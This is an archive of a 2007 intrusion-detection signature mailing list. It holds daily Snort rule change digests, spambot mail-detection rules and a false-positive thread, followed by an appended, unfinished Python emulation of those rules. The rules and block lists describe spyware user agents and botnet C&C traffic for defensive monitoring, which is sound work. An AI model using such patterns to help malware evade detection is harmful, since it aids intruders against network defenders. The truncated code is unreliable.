2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[---] Removed rules: [---]

2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to bleeding-drop-BLOCK.rules (1):
# VERSION 117

-> Added to bleeding-drop.rules (1):
# VERSION 117

-> Added to bleeding-malware.rules (2):
#by shirkdog from spyware lp data
#by Shirkdog, from spyware lp hits

-> Added to bleeding-policy.rules (2):
#by Matt Jonkman, from qru
#Moved from Malware, this is likely not spyware related

-> Added to bleeding-scan.rules (1):
#by atomic-penguin, tweak by matt Jonkman to cover other ftp daemons like freeftpd and warftpd

-> Added to bleeding-sid-msg.map (27):
2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent
2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent
2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent
2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1)
2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent
2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent
2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent
2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent
2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent
2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2)
2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3)
2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent
2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent
2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent
2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent
2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent
2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent
2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent
2002082 || BLEEDING-EDGE POLICY Unusual User Agent (Client) || url,doc.bleedingthreats.net/2002082
2003462 || BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity || url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html || url,cooldeskalert.com
2003463 || BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware
2003464 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) || url,www.warftp.org
2003465 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) || url,www.freeftp.com
2003466 || BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner || url,www.webmasterworld.com/search_engine_spiders/3227720.htm
2003467 || BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update || url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187
2003468 || BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji)
2003469 || BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar)

-> Added to bleeding-web.rules (1):
#by shirkdog

[---] Removed non-rule lines: [---]

-> Removed from bleeding-drop-BLOCK.rules (1):
# VERSION 109

-> Removed from bleeding-drop.rules (1):
# VERSION 109

-> Removed from bleeding-policy.rules (1):
#Moved from Malware, this is not spyware related

-> Removed from bleeding-scan.rules (1):
#by atomic-penguin

-> Removed from bleeding-sid-msg.map (21):
2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents3
2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2002082 || BLEEDING-EDGE POLICY Infotriever Spyware User Agent || url,www.infotriever.com/Intro_SysAdmins.asp
2404006 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) || url,www.shadowserver.org
2405006 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE || url,www.shadowserver.org


From bleeding at bleedingthreats.net Fri Mar 9 18:00:08 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Fri Mar 9 18:00:18 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070309180008.746C722C0AB@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Fri Mar 9 13:00:08 2007 [***]

[+++] Added rules: [+++]

2003470 - BLEEDING-EDGE MALWARE Winsoftware.com Spyware User-Agent (Updater) (bleeding-malware.rules)
2003471 - BLEEDING-EDGE Malware Winsoftware.com Spyware Activity (bleeding-malware.rules)
2003472 - BLEEDING-EDGE Malware DelFin Project Spyware (setup-alt) (bleeding-malware.rules)
2003473 - BLEEDING-EDGE Malware DelFin Project Spyware (payload-alt) (bleeding-malware.rules)
2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[///] Modified active rules: [///]

2001852 - BLEEDING-EDGE MALWARE 404Search Spyware User Agent (bleeding-malware.rules)
2001853 - BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent (bleeding-malware.rules)
2001854 - BLEEDING-EDGE MALWARE EZULA Spyware User Agent (bleeding-malware.rules)
2001855 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) (bleeding-malware.rules)
2001858 - BLEEDING-EDGE MALWARE Hotbar Spyware User Agent (bleeding-malware.rules)
2001859 - BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent (bleeding-malware.rules)
2001860 - BLEEDING-EDGE MALWARE Kontiki Spyware User Agent (bleeding-malware.rules)
2001861 - BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent (bleeding-malware.rules)
2001862 - BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent (bleeding-malware.rules)
2001863 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) (bleeding-malware.rules)
2001864 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) (bleeding-malware.rules)
2001865 - BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent (bleeding-malware.rules)
2001867 - BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent (bleeding-malware.rules)
2001868 - BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent (bleeding-malware.rules)
2001869 - BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent (bleeding-malware.rules)
2001870 - BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent (bleeding-malware.rules)
2001871 - BLEEDING-EDGE MALWARE Target Saver Spyware User Agent (bleeding-malware.rules)
2001872 - BLEEDING-EDGE MALWARE Visicom Spyware User Agent (bleeding-malware.rules)
2002402 - BLEEDING-EDGE MALWARE Web Search User Agent 3 (bleeding-malware.rules)
2002816 - BLEEDING-EDGE Malware DelFin Project Spyware (payload) (bleeding-malware.rules)
2002817 - BLEEDING-EDGE Malware DelFin Project Spyware (setup) (bleeding-malware.rules)
2003212 - BLEEDING-EDGE EXPLOIT Microsoft Office Data Structure Corruption (unpatched) (bleeding-exploit.rules)
2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules)
2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to bleeding-drop-BLOCK.rules (1):
# VERSION 117

-> Added to bleeding-drop.rules (1):
# VERSION 117

-> Added to bleeding-malware.rules (1):
#Matt Jonkman, from spywarelp data

-> Added to bleeding-sid-msg.map (32):
2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent
2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent
2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent
2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1)
2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent
2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent
2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent
2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent
2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent
2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2)
2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3)
2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent
2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent
2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent
2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent
2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent
2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent
2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent
2003470 || BLEEDING-EDGE MALWARE Winsoftware.com Spyware User-Agent (Updater)
2003471 || BLEEDING-EDGE Malware Winsoftware.com Spyware Activity
2003472 || BLEEDING-EDGE Malware DelFin Project Spyware (setup-alt)
2003473 || BLEEDING-EDGE Malware DelFin Project Spyware (payload-alt)
2404001 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) || url,www.shadowserver.org
2404002 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) || url,www.shadowserver.org
2404003 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) || url,www.shadowserver.org
2404004 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) || url,www.shadowserver.org
2404005 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) || url,www.shadowserver.org
2405001 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE || url,www.shadowserver.org
2405002 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE || url,www.shadowserver.org
2405003 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE || url,www.shadowserver.org
2405004 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE || url,www.shadowserver.org
2405005 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE || url,www.shadowserver.org

[---] Removed non-rule lines: [---]

-> Removed from bleeding-drop-BLOCK.rules (1):
# VERSION 116

-> Removed from bleeding-drop.rules (1):
# VERSION 116

-> Removed from bleeding-sid-msg.map (18):
2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001863 ||
BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents3
2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents
2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents


From jonkman at bleedingthreats.net Mon Mar 12 14:50:36 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Mon Mar 12 14:51:04 2007
Subject: [Bleeding-sigs] Mail sigs
Message-ID: <45F568BC.30003@bleedingthreats.net>

alert tcp !$SMTP_SERVERS any -> !$HOME_NET 25 (msg: "BLEEDING-EDGE POLICY Outbound Multiple Non-SMTP Server Emails"; content:"mail from\:"; nocase; threshold: type threshold, track by_src,count 10, seconds 120; classtype: misc-activity; sid: 2000328; rev:8;)

alert tcp !$HOME_NET any -> $HOME_NET 25 (msg: "BLEEDING-EDGE POLICY Inbound Frequent Emails - Possible Spambot Inbound"; content:"mail from\:"; nocase; threshold: type threshold, track by_src,count 10, seconds 60; classtype: misc-activity; sid: 2002087; rev:6;)

Modified these from their original form. They had no content match and just a flags:S12. Based on a few suggestions sent in, I think this will be more stable and reliable. This will hit only if the bot or malicious host is actually able to try to send mail.

Comments welcome.

Matt

-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc


From thierry.chich at ac-clermont.fr Mon Mar 12 15:25:52 2007
From: thierry.chich at ac-clermont.fr (Thierry CHICH)
Date: Mon Mar 12 15:26:23 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <45EDAA13.30209@bleedingthreats.net>
References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net> <45EDAA13.30209@bleedingthreats.net>
Message-ID: <200703121625.52462.thierry.chich@ac-clermont.fr>

On Tuesday 6 March 2007 18:51, you wrote:
> Further thought: How about this:
>
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE POLICY Unusual User Agent (Client)"; flow:to_server,established; content:"User-Agent\: Client|0d 0a|"; nocase; content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;)
>
> Posted for testing.
>
> Matt
>

It is good for me. There is no more FP. I have tried to find what can emit these messages, but it is not very easy. I have even found it on the LAN I manage. I assume it could be coming from a recent installation of MSN, but there is no evidence.

Thanks to you, Matt,

Thierry


From jonkman at bleedingthreats.net Mon Mar 12 15:32:29 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Mon Mar 12 15:32:53 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <200703121625.52462.thierry.chich@ac-clermont.fr>
References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net> <45EDAA13.30209@bleedingthreats.net> <200703121625.52462.thierry.chich@ac-clermont.fr>
Message-ID: <45F5728D.8070105@bleedingthreats.net>

Glad to hear the falses are gone. It is interesting sometimes what you find emanating from a Windows box. :) Sometimes I just sit and watch what's coming from particular workstations on the nets I manage... always find something unexpected.

Matt

Thierry CHICH wrote:
> On Tuesday 6 March 2007 18:51, you wrote:
>> Further thought: How about this:
>>
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE POLICY Unusual User Agent (Client)"; flow:to_server,established; content:"User-Agent\: Client|0d 0a|"; nocase; content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;)
>>
>> Posted for testing.
>>
>> Matt
>>
>
> It is good for me. There is no more FP. I have tried to find what can emit these messages, but it is not very easy. I have even found it on the LAN I manage. I assume it could be coming from a recent installation of MSN, but there is no evidence.
>
> Thanks to you, Matt,
>
> Thierry
>

-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc


From bleeding at bleedingthreats.net Mon Mar 12 18:00:06 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Mon Mar 12 18:00:09 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070312180006.4769722C0AB@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Mon Mar 12 14:00:05 2007 [***]

[///] Modified active rules: [///]

2000328 - BLEEDING-EDGE POLICY Outbound Multiple Non-SMTP Server Emails (bleeding-policy.rules)
2002087 - BLEEDING-EDGE POLICY Inbound Frequent Emails - Possible Spambot Inbound (bleeding-policy.rules)
2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to bleeding-drop-BLOCK.rules (1):
# VERSION 120

-> Added to bleeding-drop.rules (1):
# VERSION 120

[---] Removed non-rul
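The detection logic of the two mail-policy rules from the Mail sigs post above (sid 2000328 and 2002087: header match, "mail from:" content with nocase, and a by_src count/seconds threshold) and of rev 7 of 2002082 from the FP thread (the negated .microsoft.com content), emulated in Python and run over constructed traffic. This is an added example, not code from the list or from Bleeding Edge Threats; the $HOME_NET / $SMTP_SERVERS values, the flow records and every function name are constructed here, and flow:to_server,established is assumed to hold for the HTTP request passed to the 2002082 check.

```python
# Added example: emulate sids 2000328 / 2002087 (Mail sigs) and rev 7 of 2002082
# (FP thread) over constructed traffic. Not list or Bleeding Edge project code.
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed stand-ins for the Snort site variables $HOME_NET and $SMTP_SERVERS.
HOME_NET = ipaddress.ip_network("10.0.0.0/8")
SMTP_SERVERS = {ipaddress.ip_address("10.0.0.25")}


@dataclass
class Flow:
    ts: float      # seconds since capture start (constructed)
    src: str
    dst: str
    dport: int
    payload: bytes


class Threshold:
    """threshold: type threshold, track by_src, count N, seconds S
    Fires on every Nth matching event from one source inside an S-second window;
    window and count restart once S seconds have passed since the window opened."""

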